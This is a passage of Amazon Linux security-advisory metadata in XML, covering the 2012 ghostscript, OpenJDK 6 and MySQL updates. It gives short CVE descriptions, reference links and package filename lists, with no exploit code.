arch="i686"><filename>Packages/php-common-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.10" release="1.15.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-devel-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-gd" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-fpm-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.10" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php-pspell-5.3.10-1.15.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-imap-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-process-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-xml" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.10" release="1.15.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php-pgsql-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-cli-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-debuginfo" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-debuginfo-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-common" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-odbc-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-bcmath-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-gd-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-dba" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-dba-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.10" release="1.15.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php-intl-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-ldap-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-embedded" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-embedded-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mcrypt-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-devel" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-devel-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-fpm" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xmlrpc-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-mssql" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mssql-5.3.10-1.15.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" version="5.3.10" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysqlnd-5.3.10-1.15.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-42</id><title>Amazon Linux - ALAS-2012-42: medium priority package update for ghostscript</title><issued date="2012-02-08 13:46:00" /><updated date="2014-09-14 15:18:00" /><severity>medium</severity><description>Package updates are available 
for Amazon Linux that fix the following vulnerabilities:
CVE-2010-4820:
Ghostscript included the current working directory in its library search path by default. If a user ran Ghostscript without the "-P-" option in an attacker-controlled directory containing a specially-crafted PostScript library file, it could cause Ghostscript to execute arbitrary PostScript code. With this update, Ghostscript no longer searches the current working directory for library files by default.
CVE-2010-4054:
The gs_type2_interpret function in Ghostscript allows remote attackers to cause a denial of service (incorrect pointer dereference and application crash) via crafted font data in a compressed data stream, aka bug 691043.
A flaw was found in the way Ghostscript interpreted PostScript Type 1 and PostScript Type 2 font files. An attacker could create a specially-crafted PostScript Type 1 or PostScript Type 2 font file that, when interpreted, could cause Ghostscript to crash or, potentially, execute arbitrary code.
CVE-2010-2055:
It was found that Ghostscript always tried to read Ghostscript system initialization files from the current working directory before checking other directories, even if a search path that did not contain the current working directory was specified with the "-I" option, or the "-P-" option was used (to prevent the current working directory being searched first). If a user ran Ghostscript in an attacker-controlled directory containing a system initialization file, it could cause Ghostscript to execute arbitrary PostScript code.
Ghostscript 8.71 and earlier reads initialization files from the current working directory, which allows local users to execute arbitrary PostScript commands via a Trojan horse file, related to improper support for the -P- option to the gs program.
CVE-2009-3743:
Off-by-one error in the Ins_MINDEX function in the TrueType bytecode interpreter in Ghostscript before 8.71 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a malformed TrueType font in a document that triggers an integer overflow and a heap-based buffer overflow.
An integer overflow flaw was found in Ghostscript's TrueType bytecode interpreter. An attacker could create a specially-crafted PostScript or PDF file that, when interpreted, could cause Ghostscript to crash or, potentially, execute arbitrary code.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3743" title="" id="CVE-2009-3743" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2055" title="" id="CVE-2010-2055" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4054" title="" id="CVE-2010-4054" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4820" title="" id="CVE-2010-4820" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0095.html" title="" id="RHSA-2012:0095" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="ghostscript-doc" version="8.70" release="11.20.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-11.20.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="11.20.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-11.20.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="11.20.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-11.20.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="11.20.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-11.20.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="11.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-11.20.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="11.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-11.20.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="11.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-11.20.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="11.20.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-11.20.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-43</id><title>Amazon Linux - ALAS-2012-43: critical priority package update for java-1.6.0-openjdk</title><issued date="2012-02-15 17:12:00" /><updated date="2014-09-14 15:19:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0506:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5.0 Update 33 and earlier, and 1.4.2_35 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect integrity via unknown vectors related to CORBA.
It was discovered that the CORBA (Common Object Request Broker Architecture) implementation in Java did not properly protect repository identifiers on certain CORBA objects. This could have been used to modify immutable object data.
CVE-2012-0505:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5.0 Update 33 and earlier, and 1.4.2_35 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Serialization.
It was discovered that the exception thrown on deserialization failure did not always contain a proper identification of the cause of the failure. An untrusted Java application or applet could use this flaw to bypass Java sandbox restrictions.
CVE-2012-0503:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5.0 Update 33 and earlier, and 1.4.2_35 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability, related to I18n.
It was discovered that the use of TimeZone.setDefault() was not restricted by the SecurityManager, allowing an untrusted Java application or applet to set a new default time zone, and hence bypass Java sandbox restrictions.
CVE-2012-0502:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5.0 Update 33 and earlier, and 1.4.2_35 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality and availability, related to AWT.
A flaw was found in the AWT KeyboardFocusManager that could allow an untrusted Java application or applet to acquire keyboard focus and possibly steal sensitive information.
CVE-2012-0501:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, and 5.0 Update 33 and earlier allows remote attackers to affect availability via unknown vectors.
An off-by-one flaw, causing a stack overflow, was found in the unpacker for ZIP files. A specially-crafted ZIP archive could cause the Java Virtual Machine (JVM) to crash when opened.
CVE-2012-0497:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, and 6 Update 30 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
It was discovered that Java2D did not properly check graphics rendering objects before passing them to the native renderer. Malicious input, or an untrusted Java application or applet could use this flaw to crash the Java Virtual Machine (JVM), or bypass Java sandbox restrictions.
CVE-2011-5035:
The HttpServer class did not limit the number of headers read from HTTP requests. A remote attacker could use this flaw to make an application using HttpServer use an excessive amount of CPU time via a specially-crafted request. This update introduces a header count limit controlled using the sun.net.httpserver.maxReqHeaders property. The default value is 200.
Oracle Glassfish 2.1.1, 3.0.1, and 3.1.1, as used in Communications Server 2.0, Sun Java System Application Server 8.1 and 8.2, and possibly other products, computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters, aka Oracle security ticket S0104869.
CVE-2011-3571:
Unspecified vulnerability in the Virtual Desktop Infrastructure (VDI) component in Oracle Virtualization 3.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Session.
The AtomicReferenceArray class implementation did not properly check if the array was of the expected Object[] type. A malicious Java application or applet could use this flaw to bypass Java sandbox restrictions.
CVE-2011-3563:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 2 and earlier, 6 Update 30 and earlier, 5.0 Update 33 and earlier, and 1.4.2_35 and earlier allows remote attackers to affect confidentiality and availability via unknown vectors related to Sound.
This update fixes several vulnerabilities in the Sun Java 6 Runtime Environment and the Sun Java 6 Software Development Kit. Further information about these flaws can be found on the Oracle Java SE Critical Patch page, listed in the References section.
This update fixes several vulnerabilities in the IBM Java 6 Runtime Environment and the IBM Java 6 Software Development Kit. Detailed vulnerability descriptions are linked from the IBM "Security alerts" page, listed in the References section.
This update fixes several vulnerabilities in the IBM Java 1.4.2 Runtime Environment and the IBM Java 1.4.2 Software Development Kit. Detailed vulnerability descriptions are linked from the IBM "Security alerts" page, listed in the References section.
The Java Sound component did not properly check buffer boundaries. Malicious input, or an untrusted Java application or applet could use this flaw to cause the Java Virtual Machine (JVM) to crash or disclose a portion of its memory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3563" title="" id="CVE-2011-3563" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3571" title="" id="CVE-2011-3571" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5035" title="" id="CVE-2011-5035" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0497" title="" id="CVE-2012-0497" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0501" title="" id="CVE-2012-0501" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0502" title="" id="CVE-2012-0502" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0503" title="" id="CVE-2012-0503" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0505" title="" id="CVE-2012-0505" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0506" title="" id="CVE-2012-0506" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0135.html" title="" id="RHSA-2012:0135" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-52.1.10.6.41.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-52.1.10.6.41.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-52.1.10.6.41.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="52.1.10.6.41.amzn1" 
epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-52.1.10.6.41.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.10.6.41.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.10.6.41.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.10.6.41.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-52.1.10.6.41.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-52.1.10.6.41.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-52.1.10.6.41.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-52.1.10.6.41.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="52.1.10.6.41.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.10.6.41.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2012-44</id><title>Amazon Linux - ALAS-2012-44: important priority package update for mysql</title><issued date="2012-02-15 17:18:00" /><updated date="2014-09-14 15:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0492:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, and CVE-2012-0485.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783817:
CVE-2012-0492 mysql: Unspecified vulnerability allows remote authenticated users to affect availability
CVE-2012-0490:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect availability via unknown vectors.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783815:
CVE-2012-0490 mysql: Unspecified vulnerability allows remote authenticated users to affect availability
CVE-2012-0485:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, and CVE-2012-0492.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783809:
CVE-2012-0485 mysql: Unspecified vulnerability allows remote authenticated users to affect availability
CVE-2012-0484:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect confidentiality via unknown vectors.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783808:
CVE-2012-0484 mysql: Unspecified vulnerability allows remote authenticated users to affect confidentiality
CVE-2012-0120:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0485, and CVE-2012-0492.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783807:
CVE-2012-0120 mysql: Unspecified vulnerability allows remote authenticated users to affect availability
CVE-2012-0119:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783806:
CVE-2012-0119 mysql: Unspecified vulnerability allows remote authenticated users to affect availability
CVE-2012-0118:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and availability via unknown vectors, a different vulnerability than CVE-2012-0113.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783805:
CVE-2012-0118 mysql: Unspecified vulnerability allows remote authenticated users to affect confidentiality and availability
CVE-2012-0116:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783803:
CVE-2012-0116 mysql: Unspecified vulnerability allows remote authenticated users to affect confidentiality and integrity
CVE-2012-0115:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0119, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783802:
CVE-2012-0115 mysql: Unspecified vulnerability allows remote authenticated users to affect availability
CVE-2012-0114:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows local users to affect confidentiality and integrity via unknown vectors.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783801:
CVE-2012-0114 mysql: Unspecified vulnerability allows local users to affect confidentiality and integrity
CVE-2012-0113:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and availability via unknown vectors, a different vulnerability than CVE-2012-0118.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783800:
CVE-2012-0113 mysql: Unspecified vulnerability allows remote authenticated users to affect confidentiality and availability
CVE-2012-0112:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783799:
CVE-2012-0112 mysql: Unspecified vulnerability allows remote authenticated users to affect availability
CVE-2012-0101:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0087 and CVE-2012-0102.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783797:
CVE-2012-0101 mysql: Unspecified vulnerability allows remote authenticated users to affect availability
CVE-2012-0087:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0101 and CVE-2012-0102.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
783795:
CVE-2012-0087 mysql: Unspecified vulnerability allows remote authenticated users to affect availability
CVE-2012-0075:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect integrity via unknown vectors.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2011-2262:
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote attackers to affect availability via unknown vectors.
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2262" title="" id="CVE-2011-2262" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0075" title="" id="CVE-2012-0075" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0087" title="" id="CVE-2012-0087" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0101" title="" id="CVE-2012-0101" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0112" title="" id="CVE-2012-0112" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0113" title="" id="CVE-2012-0113" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0114" title="" id="CVE-2012-0114" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0115" title="" id="CVE-2012-0115" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0116" title="" id="CVE-2012-0116" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0118" title="" id="CVE-2012-0118" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0119" title="" id="CVE-2012-0119" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0120" title="" id="CVE-2012-0120" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0484" title="" id="CVE-2012-0484" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0485" title="" id="CVE-2012-0485" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0490" title="" id="CVE-2012-0490" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0492" title="" id="CVE-2012-0492" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0105.html" 
title="" id="RHSA-2012:0105" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="mysql-embedded-devel" version="5.1.61" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-embedded-devel-5.1.61-1.27.amzn1.i686.rpm</filename></package><package name="mysql-test" version="5.1.61" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-test-5.1.61-1.27.amzn1.i686.rpm</filename></package><package name="mysql-debuginfo" version="5.1.61" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-debuginfo-5.1.61-1.27.amzn1.i686.rpm</filename></package><package name="mysql-embedded" version="5.1.61" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-embedded-5.1.61-1.27.amzn1.i686.rpm</filename></package><package name="mysql-libs" version="5.1.61" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-libs-5.1.61-1.27.amzn1.i686.rpm</filename></package><package name="mysql-server" version="5.1.61" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-server-5.1.61-1.27.amzn1.i686.rpm</filename></package><package name="mysql-bench" version="5.1.61" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-bench-5.1.61-1.27.amzn1.i686.rpm</filename></package><package name="mysql" version="5.1.61" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-5.1.61-1.27.amzn1.i686.rpm</filename></package><package name="mysql-devel" version="5.1.61" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-devel-5.1.61-1.27.amzn1.i686.rpm</filename></package><package name="mysql" version="5.1.61" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-5.1.61-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql-libs" version="5.1.61" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-libs-5.1.61-1.27.amzn1.x86_64.rpm</filename></package><package name="mysql-server" 
